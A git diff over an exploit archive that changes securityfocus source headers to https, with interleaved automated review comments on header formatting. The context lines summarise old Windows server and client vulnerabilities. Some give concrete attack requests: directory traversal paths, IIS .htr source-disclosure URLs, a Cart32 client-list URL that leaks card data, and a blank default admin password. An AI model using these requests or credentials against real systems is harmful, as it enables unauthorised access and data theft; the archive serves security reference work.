@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/929/info +source: https://www.securityfocus.com/bid/929/info ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on. diff --git a/exploits/windows/remote/19730.c b/exploits/windows/remote/19730.c index 3295d066a..d11aec311 100644 --- a/exploits/windows/remote/19730.c +++ b/exploits/windows/remote/19730.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/949/info +source: https://www.securityfocus.com/bid/949/info InetServ is a freeware mail server for 32 bit Windows systems. diff --git a/exploits/windows/remote/19731.c b/exploits/windows/remote/19731.c index e9c6da39e..573862907 100644 --- a/exploits/windows/remote/19731.c +++ b/exploits/windows/remote/19731.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/950/info +// source: https://www.securityfocus.com/bid/950/info Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. diff --git a/exploits/windows/remote/19734.java b/exploits/windows/remote/19734.java index ea2b3f453..a0fb7ec7d 100644 --- a/exploits/windows/remote/19734.java +++ b/exploits/windows/remote/19734.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/957/info +source: https://www.securityfocus.com/bid/957/info Microsoft's Java Virtual Machine will allow the reading of local file information by a remote Java application. This can be done two ways: diff --git a/exploits/windows/remote/19737.c b/exploits/windows/remote/19737.c index 8062cadbf..17d57992e 100644 --- a/exploits/windows/remote/19737.c +++ b/exploits/windows/remote/19737.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/961/info +// source: https://www.securityfocus.com/bid/961/info Tiny FTPd is a freeware FTP server for Win9x with a Japanese interface. Version .52 and possible previous versions have unchecked buffers in the code that handles the following commands: APPE, MKD, RMD, RNFR, RNTO, SIZE, STOR, XMKD, and XRMD. With these overflows, an attacker can overwrite the stack and execute arbitrary code. diff --git a/exploits/windows/remote/19738.txt b/exploits/windows/remote/19738.txt index b0df45acc..0f626a620 100644 --- a/exploits/windows/remote/19738.txt +++ b/exploits/windows/remote/19738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/962/info +source: https://www.securityfocus.com/bid/962/info Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. diff --git a/exploits/windows/remote/19743.txt b/exploits/windows/remote/19743.txt index e34effd34..2a341f165 100644 --- a/exploits/windows/remote/19743.txt +++ b/exploits/windows/remote/19743.txt 
@@ -1,6 +1,6 @@ Cat Soft Serv-U 2.5/a/b,Windows 2000 Advanced Server/2000 Datacenter Server/2000 Professional/2000 Server/2000 Terminal Services/95/98/NT 4.0/NT Enterprise Server 4.0/NT Server 4.0/NT Terminal Server 4.0/NT Workstation 4.0 Shortcut Vulnerability -source: http://www.securityfocus.com/bid/970/info +source: https://www.securityfocus.com/bid/970/info The Windows API that handles shortcut navigation is susceptible to buffer overflow attacks. The API, "SHGetPathFromIDList" will parse a shortcut file (.lnk) to find the target file, directory or URL. A specifically malformed link will cause any program using the API to follow that shortcut to crash. diff --git a/exploits/windows/remote/19753.txt b/exploits/windows/remote/19753.txt index 1a48aaf6d..8c1fe7f51 100644 --- a/exploits/windows/remote/19753.txt +++ b/exploits/windows/remote/19753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/989/info +source: https://www.securityfocus.com/bid/989/info Microsoft's Personal Web Server and Front Page Personal Web Server will follow '/..../' strings in requested URLs, allowing remote users to obtain unauthenticated read access to files and directories on the same logical drive as the web content. Hidden files are viewable via this method, although the Front Page directory itself is not. The name and path of the desired file must be known to the attacker. diff --git a/exploits/windows/remote/19761.txt b/exploits/windows/remote/19761.txt index 4487eda90..3568e7f98 100644 --- a/exploits/windows/remote/19761.txt +++ b/exploits/windows/remote/19761.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1002/info +source: https://www.securityfocus.com/bid/1002/info The Sambar Web/FTP/Proxy Server for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system, including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by default: 'hello.bat' and 'echo.bat'. diff --git a/exploits/windows/remote/19805.txt b/exploits/windows/remote/19805.txt index 4323b8bc1..93aa9dcc2 100644 --- a/exploits/windows/remote/19805.txt +++ b/exploits/windows/remote/19805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1049/info +source: https://www.securityfocus.com/bid/1049/info By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses. diff --git a/exploits/windows/remote/19809.txt b/exploits/windows/remote/19809.txt index bed817b4a..223c000c5 100644 --- a/exploits/windows/remote/19809.txt +++ b/exploits/windows/remote/19809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1053/info +source: https://www.securityfocus.com/bid/1053/info Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. diff --git a/exploits/windows/remote/19815.txt b/exploits/windows/remote/19815.txt index c5107e608..7cde7e7ce 100644 --- a/exploits/windows/remote/19815.txt +++ b/exploits/windows/remote/19815.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1067/info +source: https://www.securityfocus.com/bid/1067/info Some versions of vqSoft vqServer for Windows are vulnerable to the common ../../ method of retrieving known files from outside of the web directory structure, accomplished by appending a variable number of "../" and a known filename to an HTTP GET request. diff --git a/exploits/windows/remote/19819.txt b/exploits/windows/remote/19819.txt index 891c512f7..4670ae340 100644 --- a/exploits/windows/remote/19819.txt +++ b/exploits/windows/remote/19819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1073/info +source: https://www.securityfocus.com/bid/1073/info WindMail is a command-line mailer that can be integrated with perl cgi applications to create form-mail capability for a website. diff --git a/exploits/windows/remote/19830.txt b/exploits/windows/remote/19830.txt index a6923cd80..0e5e6d011 100644 --- a/exploits/windows/remote/19830.txt +++ b/exploits/windows/remote/19830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1084/info +source: https://www.securityfocus.com/bid/1084/info Index Server can be used to cause IIS to display the source of .asp and possibly other server-side processed files. diff --git a/exploits/windows/remote/19845.pl b/exploits/windows/remote/19845.pl index 4cebf6ac2..cf8bddf57 100755 --- a/exploits/windows/remote/19845.pl +++ b/exploits/windows/remote/19845.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1108/info +source: https://www.securityfocus.com/bid/1108/info Two dlls (dvwssr.dll and mtd2lv.dll) included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack include an obfuscation string that manipulates the name of requested files. Knowing this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download any .asp or .asa source on the system (including files outside the web root, through usage of the '../' string). This includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to potentially gain access to the source of another company's website if hosted on the same physical machine. diff --git a/exploits/windows/remote/19846.pl b/exploits/windows/remote/19846.pl index 3504e9b97..22a5ba43f 100755 --- a/exploits/windows/remote/19846.pl +++ b/exploits/windows/remote/19846.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1109/info +source: https://www.securityfocus.com/bid/1109/info The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host. diff --git a/exploits/windows/remote/19871.txt b/exploits/windows/remote/19871.txt index c7cc7235e..9a524427f 100644 --- a/exploits/windows/remote/19871.txt +++ b/exploits/windows/remote/19871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1137/info +source: https://www.securityfocus.com/bid/1137/info Certain versions of Zone Labs personal Firewall have a vulnerability which allows malicious users to port scan the firewall without being detected. In particular if the port scan originates from source port 67 on the attacking host the ZoneAlarm fails to register the attack. 
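Review bot: in 19845.pl and 19846.pl the rewritten first line is still a bare "source:" line, in files whose mode is 100755, while the .c files in this same patch (19731.c, 19737.c) gain a "// source:" prefix and 19734.java does not. The comment prefix should be applied per language or not at all: either give the Perl headers "# source:" (and the Java one "//"), or leave the .c headers unprefixed so the header format stays uniform across the archive. Whichever rule is chosen, state it in the commit message so a later bulk edit does not undo it.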
diff --git a/exploits/windows/remote/19877.txt b/exploits/windows/remote/19877.txt index 16704801a..19cfe9024 100644 --- a/exploits/windows/remote/19877.txt +++ b/exploits/windows/remote/19877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1141/info +source: https://www.securityfocus.com/bid/1141/info htimage.exe can be used to determine if a specified path and filename exists on the target host or not. The specified path must be on the same logical drive as the web content. diff --git a/exploits/windows/remote/19881.txt b/exploits/windows/remote/19881.txt index 5d4ac0d3b..aac727dcd 100644 --- a/exploits/windows/remote/19881.txt +++ b/exploits/windows/remote/19881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1153/info +source: https://www.securityfocus.com/bid/1153/info Within cart32.exe, entering any password by way of http://target/scripts/cart32.exe/cart32clientlist, a remote user could obtain vital client information such as username, password, credit card numbers, and other crucial details. Passwords will appear encrypted, however they can be used in conjunction with specific URL requests which can be used to execute arbitrary commands. diff --git a/exploits/windows/remote/19889.c b/exploits/windows/remote/19889.c index d22b5d64e..425a62c3b 100644 --- a/exploits/windows/remote/19889.c +++ b/exploits/windows/remote/19889.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1163/info +// source: https://www.securityfocus.com/bid/1163/info Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL. diff --git a/exploits/windows/remote/19893.c b/exploits/windows/remote/19893.c index c6aa02fb0..d91463d8d 100644 --- a/exploits/windows/remote/19893.c +++ b/exploits/windows/remote/19893.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1167/info +// source: https://www.securityfocus.com/bid/1167/info The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers. diff --git a/exploits/windows/remote/19895.txt b/exploits/windows/remote/19895.txt index 0346f69d5..4564d54bb 100644 --- a/exploits/windows/remote/19895.txt +++ b/exploits/windows/remote/19895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1172/info +source: https://www.securityfocus.com/bid/1172/info DNews News Server is a CGI application that gives access to auser's NNTP server over the web. There are many unchecked buffers in the program, some of which can be exploited directly from any browser. Supplying an overlylong value for the "group", "cmd" and "utag" variables, and possibly others, will overwrite their respective buffers. In this manner, arbitrary code can be executed on the remote target. diff --git a/exploits/windows/remote/19897.txt b/exploits/windows/remote/19897.txt index 59046aa17..a49bf5995 100644 --- a/exploits/windows/remote/19897.txt +++ b/exploits/windows/remote/19897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1174/info +source: https://www.securityfocus.com/bid/1174/info The local path of a HTML, HTM, ASP, or SHTML file can be disclosed in Microsoft IIS 4.0/5.0 / Frontpage Server Extensions 1.1 and prior. Passing a path to a non-existent file to the shtml.exe or shtml.dll (depending on platform) program will display an error message stating that the file cannot be found accompanied by the full local path to the web root. For example, performing a request for http://target/_vti_bin/shtml.dll/non_existant_file.html will produce an error message stating "Cannot open "C:\localpath\non_existant_file.html": no such file or folder" 
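Review bot: in 19889.c and 19893.c the added "//" covers only the first line; the advisory text visible in the following context lines ("Unpredictable results, including system crashes ..." and "The Web Archive component of L-Soft Listserv ...") remains bare prose at the top of a .c file, so the header is only partly commented. 19730.c, earlier in this patch, already opens with "/*" before its source line. Wrapping the whole header block the same way here would be consistent with that file and would keep the description out of the code. The four-line hunks do not show where the description ends, so the closing "*/" position needs checking per file.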
diff --git a/exploits/windows/remote/19908.txt b/exploits/windows/remote/19908.txt index 332a10bce..906b64c4d 100644 --- a/exploits/windows/remote/19908.txt +++ b/exploits/windows/remote/19908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1193/info +source: https://www.securityfocus.com/bid/1193/info Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 "%20" (which is an escaped character that represents a space) from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous "%20" and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488. diff --git a/exploits/windows/remote/19914.txt b/exploits/windows/remote/19914.txt index 760f7d348..d5f8b0c42 100644 --- a/exploits/windows/remote/19914.txt +++ b/exploits/windows/remote/19914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1203/info +source: https://www.securityfocus.com/bid/1203/info Emurl software creates a unique identifier for each user, based on their account name. This identifier is encoded using the ascii value of each character in the account name and augmented by its position. By using a specific URL along with a user's identifier, it is possible to retreive that users e-mail as well as view and change their account settings. diff --git a/exploits/windows/remote/19922.pl b/exploits/windows/remote/19922.pl index cdafa70e6..691d03855 100755 --- a/exploits/windows/remote/19922.pl +++ b/exploits/windows/remote/19922.pl 
@@ -1,11 +1,11 @@ -source: http://www.securityfocus.com/bid/1216/info +source: https://www.securityfocus.com/bid/1216/info ICECap Manager is a management console for BlackICE IDS Agents and Sentries. By default, ICECap Manager listens on port 8081, transmits alert messages to another server on port 8082, and has an administrative username of 'iceman' possessing a blank password. A remote user could login to ICECap manager through port 8081 (using the default username and password if it hasn't been modified) and send out false alerts. In addition, the evaluation version of ICECap Manager has the option of utilizing Microsoft Access' JET Engine 3.5. This creates a security hazard because JET Engine 3.5 is vulnerable to remote execution of Visual Basic for Application code. Therefore, remote users may execute arbitrary commands on ICECap Manager through the use of the default username and password and JET Engine 3.5. More information can be found regarding the JET Database Engine 3.5 vulnerability at the following URL: -http://www.securityfocus.com/bid/286 +https://www.securityfocus.com/bid/286 Please note that ICECap Manager is no longer maintained by Network Ice but by Internet Security Systems. diff --git a/exploits/windows/remote/19928.txt b/exploits/windows/remote/19928.txt index e17ea2a7e..4c1bfe6e7 100644 --- a/exploits/windows/remote/19928.txt +++ b/exploits/windows/remote/19928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1221/info +source: https://www.securityfocus.com/bid/1221/info The Microsoft Active Movie Control (a multimedia ActiveX control) will download files of any type specified in the control parameters in an HTML document, regardless of whether or not they are a valid media type. A hostile website, HTML email or HTML newsgroup post could therefore write executables and other potentially harmful content to target machines, which will be stored with their known filenames in the default Windows Temp directory. 
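Review bot: the 19922.pl hunk changes two lines, and the second one ("+https://www.securityfocus.com/bid/286") sits inside the advisory body rather than on the source header that every other hunk here touches. If the rewrite is a blanket substitution over file contents, say so in the commit message and confirm that matching URLs inside exploit code or payload strings elsewhere in these files are excluded, since changing the scheme there would alter the archived material rather than its attribution.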
diff --git a/exploits/windows/remote/19939.html b/exploits/windows/remote/19939.html index 82eae262b..f8b54f70f 100644 --- a/exploits/windows/remote/19939.html +++ b/exploits/windows/remote/19939.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1224/info +source: https://www.securityfocus.com/bid/1224/info The DocumentComplete() function in IE does not properly validate origin domains. diff --git a/exploits/windows/remote/19942.txt b/exploits/windows/remote/19942.txt index ae3dbee5d..b8bd5350e 100644 --- a/exploits/windows/remote/19942.txt +++ b/exploits/windows/remote/19942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1226/info +source: https://www.securityfocus.com/bid/1226/info By default, Fortech Proxy+ can be remotely administered by any user possessing no authorization simply by connecting to http://target:4400/admin. diff --git a/exploits/windows/remote/19957.txt b/exploits/windows/remote/19957.txt index d48250872..fa164fcf7 100644 --- a/exploits/windows/remote/19957.txt +++ b/exploits/windows/remote/19957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1245/info +source: https://www.securityfocus.com/bid/1245/info A remote user can gain read and write access on a target machine running Carello shopping cart software. diff --git a/exploits/windows/remote/19973.txt b/exploits/windows/remote/19973.txt index 87a454963..a42a0c00a 100644 --- a/exploits/windows/remote/19973.txt +++ b/exploits/windows/remote/19973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1278/info +source: https://www.securityfocus.com/bid/1278/info A remote user may browse any known directory on a host running Fastraq Mailtraq 1.1.4 by making a URL request that includes the '../' string. diff --git a/exploits/windows/remote/19975.pl b/exploits/windows/remote/19975.pl index f2a55db68..5b05d4362 100755 --- a/exploits/windows/remote/19975.pl +++ b/exploits/windows/remote/19975.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1284/info +source: https://www.securityfocus.com/bid/1284/info Apache HTTP Server 1.3.x (win32) allows people to get a directory listing of a directory, if it is enabled in the config, even if an index file is present that would normally be displayed instead. This can be achieved by sending a number of "/" characters appended to an HTTP request to the server. (eg: http://www.host.com///////////////////////////////////////////////////////...) When apache calls stat() to check if the index.html (for example) exists, Windows will return an error if the path is too long. Apache incorrectly treats this as if the file does not exist. Different numbers of "/"s are required based on the length of the path to the DocumentRoot. diff --git a/exploits/windows/remote/19976.txt b/exploits/windows/remote/19976.txt index 0caba324d..78b24213c 100644 --- a/exploits/windows/remote/19976.txt +++ b/exploits/windows/remote/19976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1286/info +source: https://www.securityfocus.com/bid/1286/info Sending an email to a Concatus IMate Web Mail Server 2.5 with a server name consisting of over 1119 characters will cause the application to crash. Restarting the program is required in order to regain normal functionality. diff --git a/exploits/windows/remote/19997.java b/exploits/windows/remote/19997.java index ea487d136..d02010a32 100644 --- a/exploits/windows/remote/19997.java +++ b/exploits/windows/remote/19997.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1315/info +source: https://www.securityfocus.com/bid/1315/info EType EServ is a combination mail, news, HTTP, FTP, and proxy server. diff --git a/exploits/windows/remote/20019.txt b/exploits/windows/remote/20019.txt index 7539fe970..88b80c3c3 100644 --- a/exploits/windows/remote/20019.txt +++ b/exploits/windows/remote/20019.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1358/info +source: https://www.securityfocus.com/bid/1358/info By appending the string "/expdate" to a request for the cart32.exe executable, (http: //target/cgi-bin/cart32.exe/expdate) an attacker can access an error message followed by a debugging page containing the server variables, the Cart32 administration directory and possibly the contents of the cgi-bin. diff --git a/exploits/windows/remote/20040.c b/exploits/windows/remote/20040.c index 4d938ebce..de2a1d01c 100644 --- a/exploits/windows/remote/20040.c +++ b/exploits/windows/remote/20040.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1400/info +// source: https://www.securityfocus.com/bid/1400/info Multiple unchecked buffers exist in the POP3 and HTTP Proxy components of SapporoWorks WinProxy which could open up the possibilities of denial of service attacks or remote execution of arbitrary code. diff --git a/exploits/windows/remote/20048.txt b/exploits/windows/remote/20048.txt index fc5cf4636..131d9bec5 100644 --- a/exploits/windows/remote/20048.txt +++ b/exploits/windows/remote/20048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1415/info +source: https://www.securityfocus.com/bid/1415/info Sending a stream of binary zeros to any one of a number of Windows 2000 ports can cause 100% CPU utilization. The ports that were found vulnerable include TCP ports 7, 9, 21, 23, 7778 and UDP ports 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456. diff --git a/exploits/windows/remote/20065.txt b/exploits/windows/remote/20065.txt index 5a121579e..ac677a949 100644 --- a/exploits/windows/remote/20065.txt +++ b/exploits/windows/remote/20065.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1452/info +source: https://www.securityfocus.com/bid/1452/info Guild Ftpd will not send files outside of the ftp root when they are specified by the ../ string in the path of the GET request. However due to the difference in the error messages it is able to determine if the file requested exists. The error message "Download failed" appears if the requested file exists and "Access denied" if it does not. diff --git a/exploits/windows/remote/20066.java b/exploits/windows/remote/20066.java index a6eadf4df..a319a5739 100644 --- a/exploits/windows/remote/20066.java +++ b/exploits/windows/remote/20066.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1453/info +source: https://www.securityfocus.com/bid/1453/info A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server. diff --git a/exploits/windows/remote/20070.txt b/exploits/windows/remote/20070.txt index 771ec30a1..31ddff03d 100644 --- a/exploits/windows/remote/20070.txt +++ b/exploits/windows/remote/20070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1462/info +source: https://www.securityfocus.com/bid/1462/info The HTTP interface for WorldClient 2.1 is vulnerable to a directory traversal. By requesting a URL composed of the filename and ..\ it is possible for a remote user to retrieve and dowload any file of known location. diff --git a/exploits/windows/remote/20074.java b/exploits/windows/remote/20074.java index c9e3b2b7c..8194804fd 100644 --- a/exploits/windows/remote/20074.java +++ b/exploits/windows/remote/20074.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1477/info +source: https://www.securityfocus.com/bid/1477/info Infopulse GateKeeper proxy server will crash if a string containing over 4096 characters is entered through port 2000. Arbitrary code execution is possible. Restarting the server is required in order to regain normal functionality. diff --git a/exploits/windows/remote/20078.pl b/exploits/windows/remote/20078.pl index 03aa36eea..66f3ec5a1 100755 --- a/exploits/windows/remote/20078.pl +++ b/exploits/windows/remote/20078.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1481/info +source: https://www.securityfocus.com/bid/1481/info All versions of Microsoft Outlook and Outlook Express are vulnerable to buffer overflow attacks where a remote user is capable of executing arbitrary code on an email recipient's system. diff --git a/exploits/windows/remote/20079.txt b/exploits/windows/remote/20079.txt index c31989ee5..e99ae5335 100644 --- a/exploits/windows/remote/20079.txt +++ b/exploits/windows/remote/20079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1481/info +source: https://www.securityfocus.com/bid/1481/info All versions of Microsoft Outlook and Outlook Express are vulnerable to buffer overflow attacks where a remote user is capable of executing arbitrary code on an email recipient's system. diff --git a/exploits/windows/remote/20086.c b/exploits/windows/remote/20086.c index 62a9f8f4d..ac61d6e31 100644 --- a/exploits/windows/remote/20086.c +++ b/exploits/windows/remote/20086.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1487/info +// source: https://www.securityfocus.com/bid/1487/info O'Reilly WebSite Professional is a web server package distributed by O'Reilly & Associates. Certain versions of this web server (the entire 2.X version line) ship with a utility containing a remotely exploitable buffer overflow. The utility in question is a search engine utility titled 'webfind.exe'. This program takes unchecked user input from a provided search page which can result in a remote user launching arbitrary commands on the server itself. The variable in question which is overwritten is QUERY_STRING derived from user 'keywords' for their search. diff --git a/exploits/windows/remote/20089.txt b/exploits/windows/remote/20089.txt index d6a5a9f0c..8007fb8cd 100644 --- a/exploits/windows/remote/20089.txt +++ b/exploits/windows/remote/20089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1488/info +source: https://www.securityfocus.com/bid/1488/info Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the delimiters instead will display the entire source, or up to any '<%' in the page. This vulnerability is a variant of a previously discovered vulnerability, BugTraq ID 1193. diff --git a/exploits/windows/remote/20096.txt b/exploits/windows/remote/20096.txt index 7679300f2..008f91df5 100644 --- a/exploits/windows/remote/20096.txt +++ b/exploits/windows/remote/20096.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1499/info +source: https://www.securityfocus.com/bid/1499/info When a remote user attempts to access an area protected by basic authentication with no realm defined, while specifying HTTP 1.0, Microsoft IIS will return an Access Denied error message containing the internal IP address of the host. Even if IIS is behind a firewall or NAT, it will disclose the true internal IP address to the remote user. diff --git a/exploits/windows/remote/20103.txt b/exploits/windows/remote/20103.txt index 3b8b769cf..717e8f79d 100644 --- a/exploits/windows/remote/20103.txt +++ b/exploits/windows/remote/20103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1508/info +source: https://www.securityfocus.com/bid/1508/info Requesting a specially formed url containing encoding (%2E) to SimpleServer 1.06 and possibley earlier versions, will enable a remote user to gain read access to known files above the SimpleServer directory. diff --git a/exploits/windows/remote/20106.cpp b/exploits/windows/remote/20106.cpp index 30d869335..d07553e7c 100644 --- a/exploits/windows/remote/20106.cpp +++ b/exploits/windows/remote/20106.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1514/info +source: https://www.securityfocus.com/bid/1514/info An attacker can send the NetBIOS name service a NetBIOS Name Conflict message even when the receiving machine is not in the process of registering its NetBIOS name. The target will then not attempt to use that name in any future netwrok connection attempts. This can lead to intermittent connectivity problems, or the loss of all NetBIOS functionality. diff --git a/exploits/windows/remote/20125.txt b/exploits/windows/remote/20125.txt index 9d1c64189..953650a2a 100644 --- a/exploits/windows/remote/20125.txt +++ b/exploits/windows/remote/20125.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1525/info +source: https://www.securityfocus.com/bid/1525/info In February of 2000 CERT Coordination Center released an advisory titled "Malicious HTML Tags Embedded in Client Web Requests" (advisory attached in 'Credit' section"). This advisory was a joint release by the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense (JTF-CND), the Federal Computer Incident Response Capability (FedCIRC), and the National Infrastructure Protection Center (NIPC). The point of the advisory in essence was a warning about client side vulnerabilities brought about by malicious scripting from Rogue websites which could be exploited to run code on client side browsers (acting as unwary interpreters for the scripting in question). diff --git a/exploits/windows/remote/20134.pl b/exploits/windows/remote/20134.pl index 3eb4f1817..9644ce32d 100755 --- a/exploits/windows/remote/20134.pl +++ b/exploits/windows/remote/20134.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1536/info +source: https://www.securityfocus.com/bid/1536/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a buffer overflow vulnerability which could lead to a remote compromise of the system running the PKI server. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. diff --git a/exploits/windows/remote/20135.txt b/exploits/windows/remote/20135.txt index e3d8e158b..36472fc3a 100644 
--- a/exploits/windows/remote/20135.txt +++ b/exploits/windows/remote/20135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1537/info +source: https://www.securityfocus.com/bid/1537/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a vulnerability which allows remote attackers to read any file in the system which the PKI server resides. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. diff --git a/exploits/windows/remote/20136.txt b/exploits/windows/remote/20136.txt index 408e5b0d5..234c5d10c 100644 --- a/exploits/windows/remote/20136.txt +++ b/exploits/windows/remote/20136.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1538/info +source: https://www.securityfocus.com/bid/1538/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a vulnerability which allows remote attackers to execute arbitrary commands on the system which the PKI server resides. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. The following is taken directly from the CORE SDI advisory on this issue: diff --git a/exploits/windows/remote/20148.pl b/exploits/windows/remote/20148.pl index fe5417205..095af081a 100755 --- a/exploits/windows/remote/20148.pl +++ b/exploits/windows/remote/20148.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1568/info +source: https://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code. diff --git a/exploits/windows/remote/20151.pl b/exploits/windows/remote/20151.pl index d9d94b39a..4925baa1f 100755 --- a/exploits/windows/remote/20151.pl +++ b/exploits/windows/remote/20151.pl 
